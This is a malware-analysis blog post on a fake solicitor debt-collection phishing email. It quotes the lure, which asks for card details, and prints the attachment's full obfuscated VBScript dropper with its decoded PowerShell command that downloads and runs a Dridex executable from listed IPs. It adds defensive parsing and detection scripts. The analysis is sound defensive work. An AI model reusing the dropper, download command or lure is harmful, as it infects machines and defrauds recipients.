
Email:

Fake Aspiring Solicitors virus spam email claims you are required to pay some balance to avoid court proceedings.

Attached XML .doc contains a .xls object that downloads malware.

Or rather, it LOOKS like it contains an .xls object. It's actually a VBScript that calls PowerShell to download malware.


Subject: Aspiring Solicitors Debt Collection  

 Aspiring Solicitors

Ref : 178357674
Date : 02.10.2014
Dear Sir, Madam
Re: Our Client Bank of Scotland PLC
Account Number:07720784
Balance: 2,345.00
We are instructed by Bank of Scotland PLC in relation to the above matter.

You are required to pay the balance of GBP 2,345.00 in full within 7(seven) days from the date of this email to avoid Country Court proceedings being issued against you. Once proceedings have been issued, you will be liable for court fees and solicitors costs detailed below.

Court Fees GBP 245.00

Solicitors Costs GBP 750.00

Cheques or Postal Orders should be made payable to Bank of Scotland PLC and sent to the address in attachment below quoting the above account number.
We are instructed by our Client that they can accept payment by either Debit or Credit Card.If you wish to make a payment in this wa, then please contact us with your Card details. We will then pass these details on to our Client in order that they may process your agreed payment. Kindly note that any payment made will be shown on your Bank and/or Credit Card Statement as being made to Bank of Scotland PLC
If you have any queries regarding this matter or have a genuine reason for non payment, you should contact us within 7 days from the date of this email to avoid legal proceedings being issued against you, by filling the contact us form in attachment below.

Yours faithfully,
Christy Monroe
Aspiring Solicitors

Department CCD, Box 449
Upper Ground Floor
1-5 Queens Road Quadrant
Brighton
BN1 3XJ
United Kingdom

178357674.doc (20)

Header Examples:

19 March 2015

The From and Envelope (MAIL FROM) headers are either spoofed or filled with random junk, but they are consistent within each email.

I received 15 of these emails from 14 IP addresses in 6 countries.

Received: from dslb-188-107-206-128.188.107.pools.vodafone-ip.de [188.107.206.128]
X-Envelope-From: Marilyn.ee83 @dok.ro
Subject: Aspiring Solicitors Debt Collection
From: Frederic Pope <Marilyn.ee83 @dok.ro>

Received: from 125-227-231-1.HINET-IP.hinet.net [125.227.231.1]
X-Envelope-From: Joyce.d85 @georgeyardley.com
Subject: Aspiring Solicitors Debt Collection
From: Christy Monroe <Joyce.d85 @georgeyardley.com>

Received: from localhost [113.179.59.115]
X-Envelope-From: Mandy.314 @ehess.fr
From: Luisa Conrad <Mandy.314 @ehess.fr>
Subject: Aspiring Solicitors Debt Collection

Received: from 37-157-188-34.net1.bg [37.157.188.34]
X-Envelope-From: Boris.c832 @net1.bg
From: Cindy Barrett <Boris.c832 @net1.bg>
Subject: Aspiring Solicitors Debt Collection
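As an added example (not part of the original post), here is a small Python triage script run over the four header excerpts above. It parses each block, strips the "name @domain" spacing used above, checks that From matches X-Envelope-From within a message, and flags sending hosts whose reverse DNS is a generic pool/dynamic name or has nothing to do with the claimed sender domain. The generic_host heuristic is my own, not something the post describes; the sample text is copied from the excerpts above.

```python
import re
from collections import Counter

# The four header excerpts above, copied into the script as sample input
# (the "name @domain" spacing is the post's defanging and is removed on parse).
SAMPLES = """\
Received: from dslb-188-107-206-128.188.107.pools.vodafone-ip.de [188.107.206.128]
X-Envelope-From: Marilyn.ee83 @dok.ro
Subject: Aspiring Solicitors Debt Collection
From: Frederic Pope <Marilyn.ee83 @dok.ro>

Received: from 125-227-231-1.HINET-IP.hinet.net [125.227.231.1]
X-Envelope-From: Joyce.d85 @georgeyardley.com
Subject: Aspiring Solicitors Debt Collection
From: Christy Monroe <Joyce.d85 @georgeyardley.com>

Received: from localhost [113.179.59.115]
X-Envelope-From: Mandy.314 @ehess.fr
From: Luisa Conrad <Mandy.314 @ehess.fr>
Subject: Aspiring Solicitors Debt Collection

Received: from 37-157-188-34.net1.bg [37.157.188.34]
X-Envelope-From: Boris.c832 @net1.bg
From: Cindy Barrett <Boris.c832 @net1.bg>
Subject: Aspiring Solicitors Debt Collection
"""

RECEIVED_RE = re.compile(r"from\s+(\S+)\s+\[([\d.]+)\]")
FROM_RE = re.compile(r"(.*?)\s*<([^>]+)>")


def parse_blocks(text):
    """One dict per blank-line-separated header block."""
    msgs = []
    for block in re.split(r"\n\s*\n", text.strip()):
        hdr = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")
            hdr[key.strip().lower()] = value.strip()
        rcv = RECEIVED_RE.search(hdr.get("received", ""))
        frm = FROM_RE.match(hdr.get("from", ""))
        msgs.append({
            "host": rcv.group(1) if rcv else "",
            "ip": rcv.group(2) if rcv else "",
            "envelope_from": hdr.get("x-envelope-from", "").replace(" ", ""),
            "from_name": frm.group(1).strip() if frm else "",
            "from_addr": frm.group(2).replace(" ", "") if frm else "",
            "subject": hdr.get("subject", ""),
        })
    return msgs


def domain(addr):
    return addr.rsplit("@", 1)[-1].lower()


def generic_host(host, ip):
    """Heuristic (mine): localhost, rDNS that embeds the IP, or a dsl/pool/dyn name."""
    h = host.lower()
    if h == "localhost":
        return True
    labels = re.split(r"[.-]", h)
    if ip and all(octet in labels for octet in ip.split(".")):
        return True
    return any(tag in h for tag in ("pool", "dsl", "dyn", "dhcp"))


def assess(msg):
    """Per-message findings a triage analyst would note."""
    findings = []
    if msg["from_addr"] != msg["envelope_from"]:
        findings.append("from/envelope mismatch")
    if domain(msg["envelope_from"]) not in msg["host"].lower():
        findings.append("sender domain unrelated to sending host")
    if generic_host(msg["host"], msg["ip"]):
        findings.append("generic/dynamic sending host")
    return findings


def summarize(msgs):
    """Campaign-level view: how many sources, how many sender domains, one subject?"""
    return {
        "messages": len(msgs),
        "distinct_ips": len({m["ip"] for m in msgs}),
        "distinct_sender_domains": len({domain(m["envelope_from"]) for m in msgs}),
        "subjects": Counter(m["subject"] for m in msgs),
        "from_matches_envelope": all(m["from_addr"] == m["envelope_from"] for m in msgs),
    }


if __name__ == "__main__":
    parsed = parse_blocks(SAMPLES)
    print(summarize(parsed))
    for m in parsed:
        print(m["ip"], m["host"], assess(m))
```

On these four samples every message uses a different sending IP and a different sender domain, the From address always equals the envelope sender, and every sending host is a consumer-pool name or "localhost": that combination (one subject, many unrelated throwaway senders, botnet-style origins) is what makes a campaign cluster in a mail gateway even before the attachment is looked at.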

Malware

19 March 2015

Attachment : malicious XML-formatted .doc file with embedded .xls object that downloads malware : 178357674.doc

VirusTotal report 

ESET-NOD32    VBA/TrojanDownloader.Agent.KP
Sophos        Troj/DocDl-IR

You can download a copy of this .doc file at this Malwr.com report

This .doc file has an embedded .xls object that does the actual work:

Picture of .doc with embedded xls file.

The GOOD news is that MS Office at least seems to warn you when you try to "activate" this object by double-clicking, with a warning like "You are about to activate an embedded object that may contain viruses...".

...Well, it sounds like not EVERYONE gets a warning. So never-mind on that good news.

Picture of a tweet saying that some Office products don't show the warning.

The XML file has two big chunks of base64 data in it. The first one:

<w:binData w:name="oledata.mso">
0M8R4KGxGuEAAAAAAAAAA ....
....BoAHQAdABwADkAMQAuADIAMgA2AC4AOQAzAC4ANQAxAA==
</w:binData></w:docOleData>

...which seems to be where all the magic really is. I did find these strings in the binary after un-base64ing (without the [ ] brackets):

Root Entry
_1488187535
file:///Y:\[g]@jabber.ru\18.03.15\http91.226.93.51

Actually, screw it: The object is actually this .VBS script, shown below.

There are at least two ways to get this script out: run the thing and go get the VBS out of the temp folder (what I did), or the way Christopher Lowson (lowson.ca / twitter.com/LowsonWebmin) explained it to me: un-base64 it to a binary file, trim some front fat off the binary, add a gzip file header (but only 8 bytes of it, *shrug*), then un-gzip it.

VBScript is a Microsoft scripting language based on Visual Basic, like VBA is, but a little different.

' First literal decodes to the cmd /K powershell.exe ... download command shown below.
GVhkjbjv = Base64Decode("Y21kIC9LIHBvd2Vyc2hlbGwuZXhlIC1FeGVjdXRpb25Qb2xpY3kgYnlwYXNzIC1ub3Byb2ZpbGUgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cDovLzE3Ni4zMS4yOC4yNDQvc21vb3p5L3NoYWtlLmV4ZScsJyVURU1QJVxKSU9pb2RmaGlvSUguY2FiJyk7IGV4cGFuZCAlVEVNUCVcSklPaW9kZmhpb0lILmNhYiAlVEVNUCVcSklPaW9kZmhpb0lILmV4ZTsgc3RhcnQgJVRFTVAlXEpJT2lvZGZoaW9JSC5leGU7")

' Second literal decodes to "WScript.Shell"; the command is run hidden (window style 0).
CreateObject(Base64Decode("V1NjcmlwdC5TaGVsbA==")).Run(""& GVhkjbjv &""),0

' Hand-rolled base64 decoder so the script needs no external component.
Function Base64Decode(ByVal base64String)
    Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    Dim dataLength, sOut, groupBegin
    base64String = Replace(base64String, vbCrLf, "")
    base64String = Replace(base64String, vbTab, "")
    base64String = Replace(base64String, " ", "")
    dataLength = Len(base64String)
    If dataLength Mod 4 <> 0 Then
        Err.Raise 1, "Base64Decode", "Bad Base64 string."
        Exit Function
    End If
    For groupBegin = 1 To dataLength Step 4
        Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
        numDataBytes = 3
        nGroup = 0
        For CharCounter = 0 To 3
            thisChar = Mid(base64String, groupBegin + CharCounter, 1)
            If thisChar = "=" Then
                numDataBytes = numDataBytes - 1
                thisData = 0
            Else
                thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
            End If
            If thisData = -1 Then
                Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
                Exit Function
            End If
            nGroup = 64 * nGroup + thisData
        Next
        ' Four 6-bit symbols give 24 bits; emit them as three bytes, minus padding.
        nGroup = Hex(nGroup)
        nGroup = String(6 - Len(nGroup), "0") & nGroup
        pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
               Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
               Chr(CByte("&H" & Mid(nGroup, 5, 2)))
        sOut = sOut & Left(pOut, numDataBytes)
    Next
    Base64Decode = sOut
End Function

Which breaks down to :

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile 
(New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe',
'%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe;
start %TEMP%\JIOiodfhioIH.exe;
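A detection-side view of that command, added here as an example and not taken from the original post. The Python below runs over constructed Sysmon-style process-creation records (the pid/ppid/image/cmdline field names are assumed) for the chain WINWORD.EXE -> wscript.exe -> cmd.exe -> powershell.exe that the decoded script produces, plus a benign control. It flags any script host whose ancestry leads back to an Office application, and any command line carrying two or more of the markers visible in the decoded command (WebClient.DownloadFile, -ExecutionPolicy bypass, a .cab/.exe dropped under %TEMP%), pulling the URL out as an indicator.

```python
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe", "mshta.exe"}

# Markers taken from the decoded command above; two or more together is a cradle.
CRADLE_MARKERS = {
    "webclient_downloadfile": re.compile(r"\.DownloadFile\(", re.I),
    "executionpolicy_bypass": re.compile(r"-(?:ExecutionPolicy|ep)\s+bypass", re.I),
    "drop_in_temp": re.compile(r"%TEMP%\\\S+\.(?:cab|exe)", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"),;]+", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image basenames from `pid` up to the root, e.g. powershell <- cmd <- wscript <- winword."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def cradle_markers(cmdline):
    return [name for name, rx in CRADLE_MARKERS.items() if rx.search(cmdline)]


def extract_urls(cmdline):
    return URL_RE.findall(cmdline)


def detect(events):
    """Alerts for (a) script hosts under an Office ancestor and (b) download cradles."""
    alerts = []
    for e in events:
        chain = ancestry(events, e["pid"])
        under_office = any(img in OFFICE_APPS for img in chain[1:])
        if chain[0] in SCRIPT_HOSTS and under_office:
            alerts.append({"pid": e["pid"], "rule": "office_spawned_script_host",
                           "severity": "high", "chain": " <- ".join(chain)})
        hits = cradle_markers(e["cmdline"])
        if len(hits) >= 2:
            alerts.append({"pid": e["pid"], "rule": "powershell_download_cradle",
                           "severity": "high" if under_office else "medium",
                           "markers": hits, "urls": extract_urls(e["cmdline"])})
    return alerts


# Constructed Sysmon-style process-creation records (field names assumed), not real telemetry.
CRADLE = ("powershell.exe -ExecutionPolicy bypass -noprofile "
          "(New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe',"
          "'%TEMP%\\JIOiodfhioIH.cab'); expand %TEMP%\\JIOiodfhioIH.cab %TEMP%\\JIOiodfhioIH.exe; "
          "start %TEMP%\\JIOiodfhioIH.exe;")
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\user\Downloads\178357674.doc"'},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\user\AppData\Local\Temp\dropped.vbs"'},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /K " + CRADLE},
    {"pid": 103, "ppid": 102, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": CRADLE},
    # Benign control: an administrator running PowerShell from Explorer.
    {"pid": 200, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile Get-Process"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

The parent-chain rule fires on wscript.exe, cmd.exe and powershell.exe here because all three sit under WINWORD.EXE; the cradle rule fires on the cmd and powershell command lines and, because they also sit under Office, at high severity. The admin's Get-Process invocation under explorer.exe matches nothing.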

The second chunk of base64 is like :

<w:binData w:name="wordml://06000001.emz">
H4sIAAAAAAACC82YT2hcRRzHf9m+JApao1RUCLjGKDmkIUiE1apJag....
....eo5hzsm+LLP8DTnuK37gVAAA=
</w:binData>

...which just seems to be the icon of the .xls embedded object. In fact, if you un-base64 it you get a file like :

gzip compressed data, from NTFS filesystem (NT), max compression

And after un gzipping:

Windows Enhanced Metafile (EMF) image data version 0x10000

Which, when viewed with a hex editor, you can see the information and attributes that tie back to the icon in the .doc file:

Picture of EMF file gunzipped from binary file from second base64 in malicious doc file.
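An added example, not the author's tooling, that automates the two extractions described above (the OLE container in oledata.mso, and the gzip-wrapped EMF in the .emz entry). The Python pulls every w:binData element out of a Word 2003 XML document, base64-decodes it, sniffs for OLE2/gzip/zlib magic, inflates what it can, checks for an EMF header, and lists ASCII and UTF-16LE strings that look like paths or URLs (the file:/// string in the sample was UTF-16LE, which is why the base64 ended in "AHQAdABwADkA..."). The WordML document and its two blobs are constructed inside the script; the embedded path uses a TEST-NET address rather than the one from the sample, and the trim-then-add-gzip-header step Lowson used on the OLE contents is not reproduced.

```python
import base64
import gzip
import re
import zlib
import xml.etree.ElementTree as ET

# Word 2003 XML (WordML) namespace used by the w:binData elements.
W_NS = "http://schemas.microsoft.com/office/word/2003/wordml"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # base64 "0M8R4KGxGuE..."
GZIP_MAGIC = b"\x1f\x8b"                           # base64 "H4sI..."
ZLIB_HEADS = (b"\x78\x01", b"\x78\x9c", b"\x78\xda")


def extract_bindata(xml_text):
    """Map each w:binData name to its base64-decoded bytes (whitespace stripped)."""
    root = ET.fromstring(xml_text)
    blobs = {}
    for el in root.iter(f"{{{W_NS}}}binData"):
        name = el.get(f"{{{W_NS}}}name")
        blobs[name] = base64.b64decode("".join((el.text or "").split()))
    return blobs


def classify(blob):
    """Identify the container by magic bytes, as the `file` output above did."""
    if blob.startswith(OLE_MAGIC):
        return "ole2"
    if blob.startswith(GZIP_MAGIC):
        return "gzip"
    if blob[:2] in ZLIB_HEADS:
        return "zlib"
    return "unknown"


def inflate(blob):
    """Decompress gzip/zlib wrappers; return other data untouched."""
    kind = classify(blob)
    if kind == "gzip":
        return gzip.decompress(blob)
    if kind == "zlib":
        return zlib.decompress(blob)
    return blob


def is_emf(blob):
    """EMF starts with record type 1 (EMR_HEADER) and carries ' EMF' at offset 40."""
    return len(blob) >= 44 and blob[:4] == b"\x01\x00\x00\x00" and blob[40:44] == b" EMF"


def strings(blob, min_len=6):
    """ASCII and UTF-16LE runs of printable characters."""
    ascii_runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)
    wide_runs = re.findall(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, blob)
    return ([s.decode("ascii") for s in ascii_runs]
            + [s.decode("utf-16-le") for s in wide_runs])


def triage(xml_text):
    """Per-blob summary: container type, size, whether it inflates to EMF, path/URL strings."""
    report = {}
    for name, blob in extract_bindata(xml_text).items():
        inner = inflate(blob)
        report[name] = {
            "container": classify(blob),
            "size": len(blob),
            "emf": is_emf(inner),
            "paths": [s for s in strings(inner) if "://" in s or "http" in s.lower()],
        }
    return report


# ---- constructed sample (stands in for 178357674.doc; not the real file) ----
def _b64_lines(data):
    return base64.encodebytes(data).decode()  # wrapped at 76 chars like the real XML

_OLE_BLOB = (OLE_MAGIC + b"\x00" * 8
             + "Root Entry".encode("utf-16-le") + b"\x00\x00"
             + "file:///Y:\\placeholder\\http192.0.2.1".encode("utf-16-le"))
_EMF_BLOB = b"\x01\x00\x00\x00" + b"\x00" * 36 + b" EMF" + b"\x00" * 20
SAMPLE_WORDML = f"""<w:wordDocument xmlns:w="{W_NS}">
  <w:docOleData>
    <w:binData w:name="oledata.mso">
{_b64_lines(_OLE_BLOB)}    </w:binData>
  </w:docOleData>
  <w:binData w:name="wordml://06000001.emz">
{_b64_lines(gzip.compress(_EMF_BLOB))}    </w:binData>
</w:wordDocument>"""

if __name__ == "__main__":
    for name, info in triage(SAMPLE_WORDML).items():
        print(name, info)
```

Run against a real WordML attachment, replace SAMPLE_WORDML with the file's text; the report then shows which blob is the OLE object worth pulling apart further (an OLE parser such as olefile can walk its storages) and which is only the decoy icon.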

Long story short, this .doc would like to download an executable from places like:

176.31.28.244/smoozy/shake.exe
193.26.217.199/smoozy/shake.exe

Matt Mesa noticed that the string :

file:///Y:\g[@]jabber.ru\18.03.15\http91.226.93.51

has an ip address with a very interesting connection :

Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset.

8/62 2015-03-19 15:41:49 http://91.226.93.51/smoozy/shake.exe <--- srsly?
2/62 2015-03-19 15:07:49 http://91.226.93.51/
1/62 2015-03-18 14:54:05 http://91.226.93.51/smoozy

Say WHAT?

Downloaded executable : shake.exe (Dridex)

VirusTotal report 

Kaspersky    UDS:DangerousObject.Multi.Generic

metadata:
Original name twext.dll
Internal name twext
File version 6.00.3800.5512 (xpsp.080413-2105)

Malwr.com report 

Performs some HTTP requests
Unconventionial binary language: Russian
The binary likely contains encrypted or compressed data.
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate)
Installs itself for autorun at Windows startup

HTTP POST: 95.163.121.33
BS domain : YpSdJfvYWxem net
BS referer : https://yahoo.com/

Hybrid-Analysis.net report

Also:

Found in memory : botnet="120"
